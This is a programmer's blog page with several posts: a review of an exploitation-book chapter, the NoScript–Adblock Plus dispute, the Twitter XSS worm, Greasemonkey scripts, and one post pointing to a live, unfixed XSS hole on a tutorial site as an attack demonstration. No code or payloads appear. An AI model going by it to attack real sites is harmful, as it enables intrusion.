Skip to content

Changes and Future Directions

Sometimes I need to take a break from posting what I usually write about so that I can consider changes to make to this blog. I have tried to keep myself busy by ensuring that I finish writing a good and informative post here at least once every two weeks. However, I understand the importance of posting new entries here only when I have something interesting to write about. I do have a few half-finished drafts that might be finished and posted here at a later time. However, I am not sure what kind of work I should do next. This blog has always been primarily about the software-related work that I do. And since I am considering changing my focus on what kind of software-related work I will do, there may be some changes that will be made to this blog.

As I stated when I first started this blog, I may not be able to choose what my side projects are. Instead, these projects seem to choose me. While I may update and maintain the software that I have written, I have considered doing other work. And as it might take some time for that work to be done, I may need to spend less time writing about my work. Therefore, those who read this blog may find that they will need to wait for longer periods of time for new material to be posted here. I could post the occasional update about what I am doing, although I only plan on posting updates about what I do when that information might be of some interest to those who read what I write. However, I will continue working on this blog, as I have enjoyed working on it.

A Review of the Third Chapter of the Second Edition of “Hacking: The Art of Exploitation”

After I wrote a review of the first two chapters of the second edition of “Hacking: The Art of Exploitation” by Jon Erickson, I considered writing a review of the third chapter of it. Now that I have finished reading the third chapter of that book, which is the chapter on program exploitation, I review that chapter. In my review of the first two chapters of the book, I mentioned that the second chapter of it alone was worth the price of the book. In this review, I explain how this third chapter is as good as the chapter that preceded it.

When programmers first learn about programming, they tend to focus on simply making the programs that they write appear to run properly. Once these inexperienced programmers find that their programs appear to be free of errors, they may think that they do not need to do anything else with the programs that they have written. However, programs that seem to run correctly may have issues that could lead to unintended consequences. A mistake that is sometimes made by those who teach programming is that of emphasizing getting programs to work in typical cases. The chapter in this book on programming puts much emphasis on going beyond viewing programs as a series of statements written in a high-level language to accomplish certain tasks. This is done for reasons that become quite evident in this chapter on program exploitation.

In this third chapter of the book, methods of taking advantage of certain programming practices that should be avoided are covered. This chapter is divided into sections in which concepts such as buffer overflows and format string vulnerabilities are explained. These sections are divided into subsections in which there are examples that illustrate how these vulnerabilities can be exploited. These examples progressively increase in complexity, efficiency, and effectiveness. For example, in the section on stack-based buffer overflows, an example is given that demonstrates how a buffer being overflowed can affect what is stored in other variables. Then the possible unintended consequence of overwriting a buffer that stores a boolean value on whether or not access is to be granted is illustrated. However, this situation is one that the author admits is contrived, as whether or not it will occur depends on where variables are located in memory. Later, it is demonstrated how the GNU debugger can be used to show where one can see the memory address to which the program is to be directed. And then it is shown how that address can be overwritten with an arbitrary address when the program has a buffer overflow vulnerability. Then an assembler dump is given to show which memory addresses to which a program can be pointed. Then it is shown how memory can be overwritten with instructions that contain shell-spawning code. Then it shown how shellcode can be stored in environment variables to make attacks more efficient.

After short sections on heap-based buffer overflows and overflowing of function pointers, format string vulnerabilities are explained. In the section on format string vulnerabilities, it is demonstrated how code that appears to do what it is supposed to do can have very serious problems. It is first demonstrated how memory on the stack frame, and then in any other location can be viewed when format parameters are missing from printf function calls. Then the techniques for writing to memory addresses through the use of direct parameter access and short writes are given. It is once again shown how overwriting of memory can lead to shellcode being run through the use of methods that are similar to those given in the section on buffer overflows. It is also demonstrated how .dtors and the global offset table can have their memory addresses overwritten so that shellcode can be executed.

The author does well in explaining concepts by giving examples of more basic attacks first, and then demonstrating how more complex attacks work by building on the concepts that were previously explained. Some concepts, however, are not clearly explained. However, when a code example or concept does not quite seem to be clear to readers, they can perform their own experiments by modifying the source code that is on the CD that came with the book. As I myself experimented with the source code, I wondered if it would have been a good idea for there to be exercises included in the book for the reader to complete, as if this book were a textbook. However, readers for whom the book was intended, the inquisitive individuals who truly are hackers, should be able to come up with their own exercises so that they can reinforce their knowledge of material taught in the book. Astute readers will also try to predict upcoming material, as they may see how the different concepts taught in the book fit together. For example, when the section on .dtors and the global offset table are covered, one can predict how the memory addresses to which a program’s execution jumps can be overwritten with addresses of environment variables that contain shellcode.

This chapter was very informative in explaining and demonstrating how these exploits work. I liked how simple concepts were explained, then more complex ones were explained that built on the more basic concepts. Perhaps some of the material could have been explained better. However, there is no substitute for the practical experience that one can gain by working with the many examples that are provided in this book and on the CD that came with it. And there are many code examples included so that those who want to get the most out of the book can easily do so. Explanations of concepts are given mostly in the lucid and detailed manner that I have come to expect when reading this book. I look forward to reading the next chapter of the book, which is the chapter on networking. I also look forward to reviewing it.

Adblock Plus vs. NoScript: Inside the Dispute Between Two of the Best-Known Firefox Extensions

Whenever there is a dispute between two parties, discovering all of the important facts regarding the dispute can be difficult. There are two sides to every story about disputes between two parties. Those on one side of the dispute may accuse those on the other side of it of not being perfectly honest when giving information regarding facts about the dispute. And individuals on both sides tend to tell the truth when they accuse those on the other side of not being completely honest. When the dispute occurred between two of the best-known Firefox extensions, NoScript and Adblock Plus, the difficulty in determining what actually happened must have been evident to even those who had not followed this dispute very closely. In this entry, I give the relevant facts about this dispute, and I try to be as impartial as possible in doing so.

As those familiar with Adblock Plus (often abbreviated as ABP) know, it blocks web page content by using sets of filters. JavaScript content, Flash animations, and groups of image files are examples of what can be blocked by these filters. Any content that matches certain patterns in the source code of web pages can be blocked with ABP’s filters. As end users prefer to have web content filtered for them automatically, users can subscribe to filter lists. These lists are maintained and updated by individuals who look for content that users may want to have blocked. These lists tend to be modified over time, and users who subscribe to these lists have their lists updated periodically. Users who subscribe to these lists trust those who maintain these lists to block content that these users would want to have blocked.

NoScript is a Firefox extension that blocks much content of web pages by default. NoScript relies on the donations of users in order to fund the project, and this is done through advertising on websites run by NoScript creator Giorgio Maone. Those who have subscribed to a filter list for ABP known as EasyList may have found that some of the page content on sites run by Maone had been blocked. Maone responded to this by updating the pages on these websites so that those ads could again be viewed by those who used EasyList. Then these filters continued to be updated so that those ads would be blocked again. To Maone, it seemed as though the site content that helps create funding for the development of NoScript was being deliberately targeted by the EasyList filter for ABP. In fact, according to Maone, filter rules were implemented that would even prevent the download of NoScript from those websites. This is what led to a response from Maone that was highly controversial, and was one that he would understandably regret very much.

Firefox extensions are not “sandboxed” in the browser, meaning that there is nothing preventing them from interfering with each other. Maone took advantage of this fact. NoScript was modified so that it would actually modify ABP’s filter list so that the four websites that were targeted would be whitelisted. This interference with another extension was done rather surreptitiously. Information on this was added to the release notes of the NoScript version that performed this action. However, not many users may have read this, and Maone later admitted that he should have done more to inform users about this. One extension interfering with the operation of another, without explicitly asking for user consent, was considered a very questionable action on the part of Maone.

Some may want to read the official statements on this conflict that were written by the authors of these extensions. ABP creator Wladimir Palant’s comments about this issue can be found in this blog post. Maone’s response can be read here.

It was only in the last entry that I wrote here two weeks ago that I mentioned how NoScript could be used to defend against XSS attacks. There were many who considered NoScript a trusted extension, and it may have been considered one of the most trusted Firefox extensions in existence. In fact, all Firefox extensions can be considered trusted after they are reviewed and approved by staff members at, a website that is often referred to simply as AMO. All extensions uploaded there are considered “experimental” before their code gets reviewed. Theoretically, the trust that users would have in non-experimental extensions could be betrayed by individuals who could write extensions that get approved, only to be later modified to surreptitiously perform actions undesired by its users. One would certainly not expect an extension written by someone who seemed motivated to prevent websites from doing anything without user consent to be such an extension. However, this is what happened, and it is the reason for the recent backlash against NoScript and for its creator’s apologies. If anything good can come from this dispute, it is that this could lead to sandboxing of extensions within the Firefox web browser.

There are those, however, who would say that Palant should also admit to wrongdoing. When users install Adblock Plus, it is with the expectation that advertising that is considered intrusive will be removed by it. When viewing the four sites run by Maone, one can see that the advertising there is unlikely to be considered a reason for the existence of ad blocking software. Targeting of Maone’s sites, which Palant admitted to doing, seemed questionable. However, it seemed as though there should have been more communication between individuals on the two sides of this dispute. There had to have been a way to avoid the cycle of filter updating followed by evasion of those filters.

Both Maone and Palant have faced backlash from many users. Maone, however, has admitted to wrongdoing, and has removed the code that was the reason for his apologies. And after checking the EasyList filter list, the filters Maone mentioned no longer seem to be there. I believe that the individuals on both sides of this dispute could have done better in trying to prevent it. Those who write Firefox extensions seem to be motivated by simply making Firefox a better browser, and thus one would not expect them to have such disputes as they try to reach their common goal. It seemed as if Maone and Palant might have lost their focus, and are now not as trusted as they had previously been. However, over time, I believe that we might be able to trust these individuals and their extensions again. In any case, I hope to not have to write about a conflict between Firefox extension developers again.

The Twitter XSS Worm and Lessons That Can Be Learned From It

In the last entry that I wrote here, I mentioned the XSS worm that affected Twitter. In this entry, I describe this worm in greater detail. In addition, I explain what can be done by end users so that they can avoid being victims of attacks such as these.

This worm infected the profiles of Twitter users so that they contained malicious code. Logged-in Twitter users who would view one of these infected profiles would then, through execution of the JavaScript injected into one of these profiles via an XSS hole, have their own profiles infected with the same code. Therefore, propagation of this worm occurred via logged-in Twitter users simply viewing infected profiles. The source code used by this worm can be viewed here. As one can see by viewing this source code that is called from infected Twitter pages, it injects the malicious script and other data that would appear in profiles when they are infected with this worm. Damon Cortesi gives a good analysis of the worm here.

A number of different variations of this worm have affected Twitter. The source code used by one such variation can be viewed here. As one may be able to determine by comparing this source code to the source code used by the original worm, a fairly straightforward code obfuscation technique was used to make it different from the source code used by the original worm. Another variation of the source code, which can be viewed here, is a modified yet non-obfuscated version of the source code used by the original worm. As Giorgio Maone said, it appeared as if those trying to correct this issue were trying to defend against specific code that has been used, rather than the type of attack. A few days after this was mentioned, Lynne Pope mentioned that with variations of the worm continuing to affect Twitter, the XSS hole there did not appear to be closed. It appears as if Twitter is not doing what needs to be done to prevent attacks like these. They seem to be targeting individual attacks rather than closing the hole that allows these attacks to get through. And when there is not enough done by websites to prevent attacks like these, users need to know what they must do to protect themselves.

There are some Twitter users who may not have been affected by this worm even after viewing infected pages on Twitter. Those who use the Firefox extension named NoScript may not have been affected by it. When looking through the source code used by the worm and variations of it, one can see that code that is on a remote site is executed in order to cause the worm to propagate. After seeing this, I thought that this could be considered a reason for using NoScript. And NoScript author Giorgio Maone took this opportunity to mention that because it is very highly unlikely that NoScript users would have allowed any scripts from the sites where any malicious JavaScript file was located, NoScript users may not have been affected by this worm. In addition, Lynne Pope gives an excellent and interesting list of suggestions on what users can do to prevent anything like this from happening to them. Not surprisingly, she suggests that NoScript be used. She also mentioned that when logged into one site, one should not be logged into another one. While this certainly would prevent CSRF attacks, this might be considered excessively inconvenient by some. She does give another criticism of Twitter, saying that they should have given users the information mentioned in her blog post.

I understand that much has already been said about this worm. However, the more that is said about this, the more likely it is that users will know what can be done to keep themselves from being victims of this type of attack. Also, according to this article, those who used Google to find information on this worm may have visited malicious websites in doing so. This information that I gave here may have been given later than I should have given it. However, I have always considered it important for entries on this blog to be as well-written as possible, at the expense of being up-to-date. If I wanted to write entries that were as up-to-date as possible, I would have a Twitter account. And I would be sure to use NoScript when using that Twitter account.

Do Not Remember Me: A Greasemonkey Script for Those Who Do Not Want to Be “Remembered” by Websites

It seems that nearly every website that has a form for logging into it includes an option for having the website “remember” the user. Some users find it convenient to be “remembered” by sites, as when they are remembered, they will not need to enter their usernames and passwords as often. However, there are disadvantages to being remembered by sites. Some users are not the only ones who use their computers, and would thus want to ensure that a feature that could allow other users of their computers access to their accounts would not be selected. In addition, cross-site request forgery (CSRF) attacks depend on users being logged into sites, as several Twitter users discovered recently. Therefore, use of a “remember me” feature could increase the probability of users being victims of CSRF attacks.

Despite these facts, some websites have the option to be remembered by them selected by default. However, some users may want to try to make it less likely that others will access their accounts by ensuring that the option to be remembered would never be selected. And some might consider it a nuisance to need to deselect the option to be remembered by a site each time they want to log into a site. For these reasons, I decided to write a Greasemonkey script that would remove the checkmarks from checkboxes for indicating that the user wants to be remembered by websites.

This Greasemonkey script that I titled “Do Not Remember Me” is one that looks for checkboxes on web pages and determines whether or not they are for remembering users by checking nearby page material. By default, it is set to work with all websites. However, some users may want to be remembered by some websites. For that reason, this script is one that users of it may want to configure so that it will not be used by some websites.

This script, like other Greasemonkey scripts that are made to work with all websites, might possibly not actually work with all websites. Some users might find errors in it that will cause it to not work with some websites. However, I have found that it does work with the websites that made me want to write this script. Some who often log into, the website where this and many other Greasemonkey scripts can be found, may want to use this script. As you can see if you view the login page on, the option to be remembered by that site is selected at first. I myself did not want to keep removing the checkmark from the option to be remembered by that website. It also works with the login page on Google Accounts, which also remembers its users by default. I have also found that it works with Hotmail’s login page. I also set it up so that it would actually add checkmarks to checkboxes that say “public terminal” beside them, as one can see by viewing Slashdot with the script enabled. In addition to ensuring that it works with as many sites as possible, I have tried making it as efficient as possible. It might not currently be as efficient as it could and should be. However, I chose to release it as it is so that I could allow others to critique it.

I could make this post less boring by mentioning some more interesting facts about it. I originally decided to call this script “Don’t Remember Me.” However, it might then be referred to as “DRM.” Many consider that the acronym for Digital Rights Management. I wanted to avoid this acronym collision, even though I did not think that this script would ever be listed on Wikipedia’s disambiguation page for DRM. Some who would look through the code may not be entertained when viewing it. However, I thought of mentioning that the purpose of one function in the script was to “check checkboxes to check if they should be unchecked” and eventually decided to choose clarity over comedy in my comments.

If you have Greasemonkey installed, then you can install this script if you click here. As always, I would be pleased to answer any questions about this script. I could go into greater detail about the implementation of what I wrote, although I do not tend to be asked questions about the implementation details of what I write. I will say that I have also considered writing a very similar script titled “Do Not Remember My Passwords.” As you may have surmised, it would deselect checkboxes for indicating that passwords are to be remembered. I considered combining these two scripts into one titled “Do Not Remember Me and Do Not Remember My Passwords Either” although I thought it might be best to keep these scripts separate. However, what I do next with this script and any related ones may depend on any suggestions that I may receive.

One Programmer’s View of How Programmers View Resumes

I try not to bore those who would read what I write. Therefore, I consider it at least somewhat important to make the material that I write here at least somewhat entertaining. For that reason, I wanted to write a post here that would be considered humourous. I have had some difficulty in trying to find any humourous material to write about. That is, until I came across this amusing blog post to write about.

This blog post was one that I discovered at a time when I was unsure what to write about next. It was one of those serendipitous moments that sometimes occur when I am unsure what to write about. I was testing a Greasemonkey user script with sites that have login forms. And it was while I was testing that script with the login form on Reddit that I came across a link to this comic on how programmers read resumes that was a part of this blog post.

In that blog post, that comic preceded what the author of it referred to as “real tips” that were in the form of links to articles elsewhere on the web. While that post may have been intended to be comical, the humour in it must have been based on the author’s opinions. And from what I was able to glean from viewing his website, he is a programmer who has been involved in hiring programmers. Perhaps what was noted there was based on his experiences in working with other programmers. He as well as some other programmers may be biased toward those who have their e-mail addresses at their own domains, and have compiled their resumes using LaTeX. There may be those who would be disinterested in candidates who would list Visual Basic first among the programming languages that these candidates know. And I can certainly understand why programmers would prefer to hire those would write their own compilers or operating systems.

I cannot be certain as to how accurate that comic may be. Its accuracy, or lack thereof, is debatable. However, that comic was found to be humourous by many individuals. It was the kind of material that I would occasionally like to have here. I would like to be able to find a way to make my own material amusing. Until I can find ways to do that, perhaps I will work on writing a compiler or an operating system.

The Importance of NoScript’s Surrogate Scripts

The tradeoff between security and convenience is one that users often face when browsing the web. Those who prefer security at the expense of convenience would prefer to use the Firefox extension called NoScript, which is an extension whose name emphasizes the measures it takes to secure the browser. There are those who would say that the measures that NoScript takes in making Firefox a more secure browser are too excessive, as it blocks all scripts that are not whitelisted. Much web page content is blocked by NoScript until whitelisted. And that can be quite inconvenient, as users of my Greasemonkey script that works with embedded YouTube videos have noted on a few occasions. Some pages actually may not function correctly at all when sites such as are blocked by NoScript. As some users do not want to have to choose between allowing all scripts that a page uses and not having the page function correctly, an attempt at solving this issue is implemented in the more recent versions of NoScript. Newer versions of NoScript replace some blocked scripts with scripts that are known as surrogate scripts.

These surrogate scripts handle the situations in which 3rd party scripts from sites such as look for page content that is blocked by NoScript. These surrogate scripts cause pages to be more likely to be error-free by replacing blocked scripts with similar scripts. Some concerned “non-geeks” have wanted to know if these surrogate scripts send any data to 3rd party sites. However, those who have viewed and understand the source code in these scripts can assure these individuals that these scripts simply try to prevent web pages from being broken. There are some users of NoScript who had previously found that some pages were broken unless scripts from sites such as were allowed. I found that when scripts from were blocked, pages on appeared to be broken. However, these pages did not appear to be broken when the surrogate script for was used. I have also found that these surrogate scripts cut down on the clutter that appears in the error console, as there would be fewer errors on pages when these surrogate scripts are used.

Users who have used the more recent versions of NoScript may have used these surrogate scripts without even knowing that they used them. However, there are those who might want to more easily configure these scripts. At this time, there is no user interface for configuration of surrogate scripts, because as NoScript author Giorgio Maone says, those who would configure these scripts and options regarding them would likely not need one. Still, a UI would be convenient, as adjustments to configuration settings may sometimes be necessary. One might want to more easily adjust which sites use surrogate scripts and which ones do not. Also, one might want to be informed when sites are using these surrogate scripts. In fact, I decided to make a few adjustments to surrogate scripts so that they would display information that says surrogate scripts are being used right on these pages where they are used.

I wanted to know when the surrogate script for code from was being used. So I added a JavaScript alert statement to the surrogate script for to determine this. As those who are familiar with JavaScript know, that statement would make a pop-up window appear when that script is executed. I then decided to make that code more complex by adding code to it that would execute when the page is finished loading so that text would be added directly to pages to indicate that this surrogate script is being used with these pages. However, it would be preferable for information on when these scripts are being used to instead be in the browser UI.

Users of the web may always need to choose between security and convenience. The newer versions of NoScript make it so that less convenience would need to be sacrificed for improved security. Still, it would be more convenient for there to be a UI to work with these surrogate scripts used by NoScript. However, it is good to know that the decision to choose security over convenience when browsing the web now seems to be a less difficult one to make.

A Defence of a Greasemonkey Script That I Never Thought I Would Defend

It was almost a year ago that I quickly wrote a Greasemonkey user script titled “Web Form Data Analyzer.” This script, which can be found here, is one that modifies the action attributes of <form> tags of web pages so that submitted form data is redirected to a page that displays exactly what data gets submitted through forms. The page to which the data is sent is one that is specifically for displaying that data, and is part of the official reference website for the book titled “Webbots, Spiders, and Screen Scrapers” by Michael Schrenk. It is not a script that I have often used myself, as I have not taken much time to view what data is sent via web forms. When I first released that script, I mentioned that I did not expect there to be much interest in it. There are some, however, who have installed this script. It also received a negative review from a user on, which stated there is no way to ensure that the page to which the form data is sent can be trusted. In addition, it was said in that review that one should instead use a Firefox extension titled “Tamper Data” as that extension is one that can be trusted. While that extension can be used to view submitted form data, there are reasons one may prefer to use the script that I wrote instead.

While some might like to be able to view data that is being sent to and from a web browser, there are those who may find that the Tamper Data extension is not what they need. Those who want to be able to view the data that is sent via web forms may want something more simple, and something that is specialized to the task of displaying the data that is sent through forms. The Web Form Data Analyzer script is for those who only need the software to perform the task that it performs. In addition, the script displays the form data that would be sent through the form without the data ever being sent to the website to which form data is supposed to be sent. Therefore, those who would prefer to simply view the data that would be sent through a form without actually submitting it to the site where it is supposed to go may prefer to use this script.

There may be those who are not sure if the page to which the script redirects submitted form data will accurately display this submitted data. However, the source code that this page apparently uses can be viewed here. As one can see by viewing that code, it is simply PHP code that displays values that would be stored in variables when form data is submitted. And if one does not think that that page actually uses that source code, then the script could be modified so that the page to which it redirects form data will be different. What would be needed in that case would be a web server to host a page that uses code that displays this data. One would likely be using Firefox when using this script, and so one would likely be able to use an extension called Plain Old Webserver to set up a web server. Going through this process of setting up a web server that hosts this page might seem like more work than it is worth, although it is a way to ensure that the data returned will be accurate.

This script may be useful for those who trust the official reference website for the book titled “Webbots, Spiders, and Screen Scrapers.” Those who do not trust it may find that there are other methods for determining what data is sent through web forms. Opinions on whether or not that page can be trusted may differ, and this script is useful for those who believe that the page that this script uses is reliable.

An Introduction to JavaScript Forms That Is Also an Introduction to How to Perform XSS Attacks

I sometimes take time to visit to see if any high profile websites are, or had been, vulnerable to XSS attacks. I also look to see how long it takes websites to remove vulnerabilities to XSS attacks. High profile websites such as Google and Facebook tend to have these vulnerabilities removed within short periods of time. Websites that are not as well-known tend to be left vulnerable to XSS attacks, as you can see if you view this archive of XSS vulnerabilities. One reason this is the case is that these websites would not be targeted by XSS attacks as often. There is less incentive for individuals to target relatively low profile sites. In fact, these sites that are less likely to be targeted can be vulnerable to some of the most simple XSS attacks.

After recently checking which sites were listed as having XSS vulnerabilities, I noticed a site listed there that is vulnerable to the most simple XSS attacks. The site, titled, contains JavaScript tutorials, and includes the implementations of the JavaScript example code in it. And the implementation of one of these examples contains an XSS vulnerability. The example was designed to be very basic, and so it would be expected that no methods for preventing XSS attacks would be included in the implementation of it. It is an implementation of code for submitting data through a form, and it simply displays what was submitted through that form. Therefore, if any code is submitted through the form, that code would be added to the page that appears after the form data is submitted. This vulnerability posted to can give a basic idea of how XSS attacks work, as it demonstrates only code injection, with no filter evasion techniques.

As of the time that this post was published, nothing has been done to correct this vulnerability. This may not be because whoever wrote the PHP code that works with data submitted through the form was not informed of this. This was likely because it is not as important for there to be XSS prevention measures to be taken with this site as there would be with other sites. For example, theft of cookies or authentication credentials is not an issue with this site. In any case, this page provides an example of how to perform an XSS attack by simply making a page display any data submitted by a user.

User Feedback Still Driving the Development of My Greasemonkey Script for Embedded YouTube Videos

I have mentioned before that the software that I have written is written primarily for myself. However, I sometimes gradually lose interest in using the software that I wrote for myself. When this happens, I am not as likely to discover errors in what I wrote. Therefore, those who use what I wrote test my software for me through their use of it. Although these users might not consider their use of my software testing of my software, a sufficiently large number of them will be able to find errors in what I write. Although I would prefer to find errors before these users do, these errors do get corrected regardless of who finds them. Once again, an error was found in my Greasemonkey script that adds links below embedded YouTube videos to the pages on YouTube where these videos can be found. And once again, the discovery of this error was made by a user of this script.

What was discovered may not be considered a bug, as not displaying links below embedded videos that are no longer available on YouTube might be considered expected from this script. However, when I found the time to work on this, I found that the script would add links below videos that are no longer available on YouTube when the option to display video titles is not selected. I needed to find a more appropriate way for this situation to be handled, as the script did not handle this case consistently.

I decided to update the script so that it will always add links below embedded YouTube videos that are no longer available on YouTube. However, it will also add information saying that the title of the video is not available in this case. This information will not be displayed if the option to display titles is not selected. I personally think that this may be considered an appropriate way to handle this situation. However, some might prefer that information on whether or not the video is available always be included in the links added by the script.

If any users have any ideas on better ways to handle this situation, I would like to know what they are. Once again, suggestions from end users will likely be implemented.